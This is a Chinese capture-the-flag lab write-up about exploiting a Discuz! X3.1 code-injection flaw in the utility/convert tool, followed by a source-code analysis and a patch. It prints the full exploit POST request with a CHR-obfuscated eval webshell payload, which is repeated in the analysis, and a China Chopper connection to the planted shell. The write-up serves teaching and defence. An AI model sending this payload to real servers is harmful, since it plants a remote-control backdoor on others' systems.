实验环境
i 春秋 --- 竞赛训练 -- 这不是DZ?
操作机: Windows XP
实验工具:BURP、中国菜刀
目标:获取www.test.ichunqiu网站的服务器权限。
信息搜集
这是一个纯内网环境,与外界没有联网。渗透目标单一,不需要做太多的信息搜集。
打开目标网站:
嗯,特别清楚的Discuz CMS。
图片1.png
简单分析一下CMS信息:Discuz! x3.1,显然。
信息搜集是可以考察一下技术支持单位,检查 “Powered by”信息。获取CMS信息,去网上找找有没有他的开源代码或是漏洞信息。
信息搜集之 漏洞信息搜集
利用百度、Google等搜索引擎搜集漏洞信息。(由于实验环境没有网,这些资料要在本地环境搜集)
这里可能会用到 Google hacking,搜索引擎语法。
漏洞信息 在一些漏洞平台比如乌云、补天、seebug等都可能有,当然有些可能要收费才能观看。
图片2.png
随便找了几个,就找到了我们需要的。https://www.exehack.net/134.html
漏洞:http://www.wooyun.org/bugs/wooyun-2010-045611
漏洞利用:
参加:https://bbs.ichunqiu.com/thread-1909-1-1.html
我有点懒得写了,直接复制粘贴,待会直接写源码分析了
打开 www.test.ichunqiu/utility/convert
图3 - 漏洞所在页面
直接使用EXP吧
POST /utility/convert/index.php HTTP/1.1
Host: www.test.ichunqiu
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 199
Content-Type: application/x-www-form-urlencoded
a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes
其实其他都不重要,最后一句所传的数据才是重点!
图4 - Burp修改数据包
上菜刀!拿shell!
地址:www.test.ichunqiu/utility/convert/data/config.inc.php 密码:c
图5 - 菜刀
图6 - getshell
源码分析
这漏洞出现在一个DZ X系列自带的转换工具里面!
漏洞路径:utility/convert/data/config.inc.php在开始设置里面可以设置数据的属性,而post的数据直接写到了config.inc.php这个文件里面,无任何过滤检测!
我从网上下载了Discuz x3.1的源码包,利用notepad++进行代码审计。
payload
首先我们看一下完整的payload:
a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes
漏洞原理
index.php 文件分析
首先,打开 utility/convert/index.php 的源码:
<?php
// 包含了common.inc.php文件
require './include/common.inc.php';
// 关于getgpc函数 在global_func.php 中。参考:http://blog.csdn.net/xavierdarkness/article/details/78062852
$action = getgpc('a'); // 取$_POST['a'],直接赋值给$action ,此时$action = config;
$action = empty($action) ? getgpc('action') : $action; //此时 $action = config;
$source = getgpc('source') ? getgpc('source') : getgpc('s'); // $source = d7.2_x2.0 HTTP/1.1;
$step = getgpc('step');
$start = getgpc('start');
……省略部分源码……
if($action == 'source') {
require DISCUZ_ROOT.'./include/do_source.inc.php';
// common.inc.php 如果config.inc.php文件不存在,就为true
} elseif($action == 'config' || CONFIG_EMPTY) { // $action = config; 包含./include/do_config.inc.php 文件
require DISCUZ_ROOT.'./include/do_config.inc.php';
} elseif($action == 'setting') {
……省略 ……
?>
do_config.inc.php 文件分析
<?php
$configfile = DISCUZ_ROOT.'./data/config.inc.php';
$configfile_default = DISCUZ_ROOT.'./data/config.default.php';
// 创建config.inc.php
@touch($configfile);
// 检查写入权限
if(!is_writable($configfile)) {
showmessage('config_write_error');
}
$config_default = loadconfig('config.default.php'); // 设置配置文件
$error = array();
// submitcheck()返回true,此函数定义在 include\global.func.php 文件中
if(submitcheck()) {
$newconfig = getgpc('newconfig'); //取$_POST[newconfig]数据
/*此时newconfig[aaa
eval(eval("$_POST[c];"););//];
*/
if(is_array($newconfig)) {
$checkarray = $setting['config']['ucenter'] ? array('source', 'target', 'ucenter') : array('source', 'target');
foreach ($checkarray as $key) {
if(!empty($newconfig[$key]['dbhost'])) {
$check = mysql_connect_test($newconfig[$key], $key);
if($check < 0) {
$error[$key] = lang('mysql_connect_error_'.abs($check));
}
} else {
$error[$key] = lang('mysql_config_error');
}
}
//保存$newconfig到$configfile文件中,即config.inc.php文件。接下去查看一下这个函数吧。
save_config_file($configfile, $newconfig, $config_default);
if(empty($error)) {
$db_target = new db_mysql($newconfig['target']);
$db_target->connect();
delete_process('all');
showmessage('config_success', 'index.php?a=select&source='.$source);
}
}
}
?>
函数 save_config_file
所在文件:\utility\convert\include\global.func.php
function save_config_file($filename, $config, $default) {
$config = setdefault($config, $default); // 将$config中的空白项用 $default 中对应项的值填充
// 联系上下文,即将 './data/config.default.php'文件对应项 赋值给 $newconfig 这个数组中对应的空白项
// 此时的$config = $newconfig+config.default.php对应项的补充
$date = gmdate("Y-m-d H:i:s", time() + 3600 * 8);
$year = date('Y');
$content = <<<EOT
<?php
\$_config = array();
EOT;
// 看下一步getvars函数,此时的$config = $newconfig+config.default.php对应项的补充
$content .= getvars(array('_config' => $config));
$content .= "\r\n// ".str_pad(' THE END ', 50, '-', STR_PAD_BOTH)." //\r\n\r\n?>";
file_put_contents($filename, $content);
}
function setdefault($var, $default) {
foreach ($default as $k => $v) {
if(!isset($var[$k])) {
$var[$k] = $default[$k];
} elseif(is_array($v)) {
$var[$k] = setdefault($var[$k], $default[$k]);
}
}
return $var;
}
函数 getvars
所在文件:\utility\convert\include\global.func.php
// $data = array('_config' => $config) 其中 $config = $newconfig+config.default.php对应项的补充
function getvars($data, $type = 'VAR') {
$evaluate = '';
foreach($data as $key => $val) {
if(!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $key)) {
continue;
}
if(is_array($val)) {
// 查看buildarray函数,$key 即为_config
$evaluate .= buildarray($val, 0, "\${$key}")."\r\n";
} else {
$val = addcslashes($val, '\'\\');
$evaluate .= $type == 'VAR' ? "\$$key = '$val';\n" : "define('".strtoupper($key)."', '$val');\n";
}
}
return $evaluate;
}
buildarray函数
所在文件:\utility\convert\include\global.func.php
// 这里的$array=$config $level=0 $pre=$_config
function buildarray($array, $level = 0, $pre = '$_config') {
static $ks;
if($level == 0) {
$ks = array();
$return = '';
}
foreach ($array as $key => $val) {
// 遍历$config 中的 $key => $val , 键值对应项
if($level == 0) {
//str_pad — 使用另一个字符串填充字符串为指定长度
// 第一个参数是要输出的字符串,指定长度为50,用'-'填充,居中
$newline = str_pad(' CONFIG '.strtoupper($key).' ', 50, '-', STR_PAD_BOTH);
/*
这里是产生漏洞关键
1. DISCUZ的本意是使用$config数组的key作为每一块配置区域的"注释标题"
2. 写入配置文件的$newline依赖于$key,而$key是攻击者可控的
3. 未对输入数据进行正确的边界处理,导致攻击者在输入数据中插入换行符,逃离注释的作用范围,从而使输入数据转化为可执行代码
1) 换行符
2) ?>
这类定界符都是可以达到同样的效果的
*/
$return .= "\r\n// $newline //\r\n";
}
$ks[$level] = $ks[$level - 1]."['$key']";
if(is_array($val)) {
$ks[$level] = $ks[$level - 1]."['$key']";
$return .= buildarray($val, $level + 1, $pre);
} else {
$val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\''.addcslashes($val, '\'\\').'\'' : $val;
$return .= $pre.$ks[$level - 1]."['$key']"." = $val;\r\n";
}
}
return $return;
}
攻击造成的效果:
效果图
newconfig部分对照ASCII码转换一下就是如下所示:(%0a%0d对应Windows下的换行操作 \n\r)
newconfig[aaa
eval(eval("$_POST[c];"););//]=aaaa
这里我们就是通过%0a%0d进行换行操作来绕过注释,并成功将我们的恶意代码写入文件,不被注释掉,从而导致我们可以通过菜刀直接连接。
防御方法
\discuz\utility\convert\include\global.func.php
function buildarray($array, $level = 0, $pre = '$_config')
{
static $ks;
if($level == 0){
$ks = array();
$return = '';
}
foreach ($array as $key => $val){
//过滤掉$key中的非字母、数字及下划线字符
$key = preg_replace("/[^\w]/", "", $key);
if($level == 0) {
$newline = str_pad(' CONFIG '.strtoupper($key).' ', 50, '-', STR_PAD_BOTH);
$return .= "\r\n// $newline //\r\n";
}
$ks[$level] = $ks[$level - 1]."['$key']";
if(is_array($val)){
$ks[$level] = $ks[$level - 1]."['$key']";
$return .= buildarray($val, $level + 1, $pre);
}else{
$val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\''.addcslashes($val, '\'\\').'\'' : $val;
$return .= $pre.$ks[$level - 1]."['$key']"." = $val;\r\n";
}
}
return $return;
}
同一个漏洞别人写的文章:http://www.cnblogs.com/LittleHann/p/4317665.html
